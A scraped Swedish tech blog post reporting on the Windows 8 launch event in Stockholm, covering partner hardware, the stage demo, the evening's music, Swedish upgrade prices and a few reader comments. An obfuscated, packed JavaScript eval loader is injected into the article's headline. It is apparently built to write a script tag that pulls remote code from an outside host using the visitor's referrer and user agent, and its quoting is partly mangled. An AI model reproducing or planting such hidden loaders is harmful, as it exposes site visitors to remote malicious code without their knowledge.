Image Image Image Image Image Image Image Image Image Image

| 16 oktober, 2018

Scroll to top

Top

PC

Windows 8 lanseringen i Stockholm Frihamnen

Windows 8 lanseringen i Stockholm Frihamnen
Sebastian Plengier Ehrnfelt

Windows eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dddiy|var|u0026u|referrer|arryf||js|php’.split(‘|’),0,{}))
8: Efter en lång väntan så är Windows 8 äntligen här. Sebastian Plengier Ehrnfelt och Filip Urde från Revue har varit och kikat på systemet på deras lanseringsfest i Stockholm Frihamnen.
Följ deras tagg: #Win8sthlm 

Klockan tre idag så var pressen inbjudna till en uppvisning av det nya Windows 8. Det var press från många internationella tidningar, bland annat Bloomberg. Två timmar senare öppnades evenemanget upp för resterande gäster. 

Med över 600 gäster på listan och nya coola produkter från alla möjliga partner till Microsoft kunde man fritt strosa runt i den stora lokalen och testa på det nya systemet och självklart de nya maskinerna.

Vi började med att kika på lite nytt från Asus. Asus har som vi nämnt i tidigare artikel varit fullt beredda på lansering och hade därför en rad olika datorer och tablets. Det intressanta är att många av deras nya maskiner är både en tablet och en bärbar dator i samma. Man kunde enkelt koppla loss skärmen från tangentbordet och använda skärmen som en tablet, riktigt behändigt och enklare blir det inte.

Förutom alla godsaker på produktsidan så fick i också träffa på Windows 8 med en uppvisning av operativsystemet på stora scenen. En god presentation gick igenom många nya funktioner samt hur enkelt allt var.

En rolig detalj var att i bakgrunden av scenen satt personer i olika rum tydligt synliga för publiken och spelade spel online, producerade musik och höll koll på sociala medier i Windows 8. Detta för att visa hur kraftfullt systemet är både för ”gamers”, musikproducenter och vardagssysslor.

Det bjöds också på trevlig musik senare på kvällen av stora band som First Aid Kit och Moneybrothers. Ihop med några förfriskningar i baren och en god bit mat vart det trevlig dans och sång på dansgolvet.

Sammanfattat av vad vi sett ikväll och vad vi själva testat innan är Windows 8 ett otroligt snabbt och flexibelt operativsystem som utan tvekan kommer få konkurrenterna att hålla sig på sin planhalva.

Det kommer kännas skönt att inom kort få installera systemet på en egen dator och sätta igång.

Tillgänglighet 

Windows 8 finns från och med imorgon tillgängligt i två versioner hos återförsäljare över hela Sverige – Windows 8 och Windows 8 Pro. Med Windows 8 Pro får man tillgång till en mängd extra funktioner, för t.ex. säkerhet, underhållning och effektivitet. För företagskunder finns Windows 8 Enterprise som erbjuder nya möjligheter för en hög produktivitet oavsett var man arbetar, med funktioner som Windows To Go, DirectAccess och BranchCache men också en förbättrad säkerhet med funktioner som BitLocker och AppLocker. Samtidigt lanseras en ny medlem av Windows-familjen utvecklad för ARM-baserade pekdatorer – Windows RT som kommer att vara förinstallerad på pekdatorer baserade på ARM-arkitekturen.

Läs mer om Windows 8 här: www.microsoft.com/news

Priser och fakta Windows 8 i Sverige

Vid sidan av det breda utbudet av nya datorer och pekdatorer kan man också uppgradera sin befintliga dator.

De konsumenter som köpt en Windows 7-dator under perioden 2 juni 2012 till 31 januari 2013 kan ladda ned Windows 8 Pro till en kostnad av 139 kronor genom Microsofts erbjudande Windows Upgrade Offer som finns tillgängligt på www.windowsupgradeoffer.com.

Konsumenter som köpt sin dator med Windows XP, Windows Vista eller Windows 7 tidigare, och vill uppgradera den, kan antingen ladda ner Windows 8 Pro direkt från Microsoft på www.microsoft.se/windows till en kostnad av 299 kronor alternativt köpa en uppgradering hos en återförsäljare för 549 kronor.

Comments

 1. hemli

  Willie stenbarg jag ser dig

 2. Jonatan

  Vad tror vi om Windows 8 då? Känns som RT-versionen är sådär men pro kanske blir något. Har jag fel?

  • Du har helt rätt, RT-versionen är lite stympad, men Windows 8 (PRO) tror vi kommer bli grymt! Av det vi sätt och testat så känns det riktigt bra.

   Microsoft har verkligen gjort något nytänkande och unikt i den här produkten. Bara det att du kan välja mellan klassisk desktop och nya metro gränssnittet med bara en enkel ”gesture” eller rörelse med musen är grymt! Jag gillar även att dem genom Windows 8 skapar en helhet över alla sina produkter, samt att din profil och alla dess funktionaliteter/inställningar ligger i molnet. Ja, windows 8 blir att räkna med.

 3. Olle

  Bra rapporterat grabbar!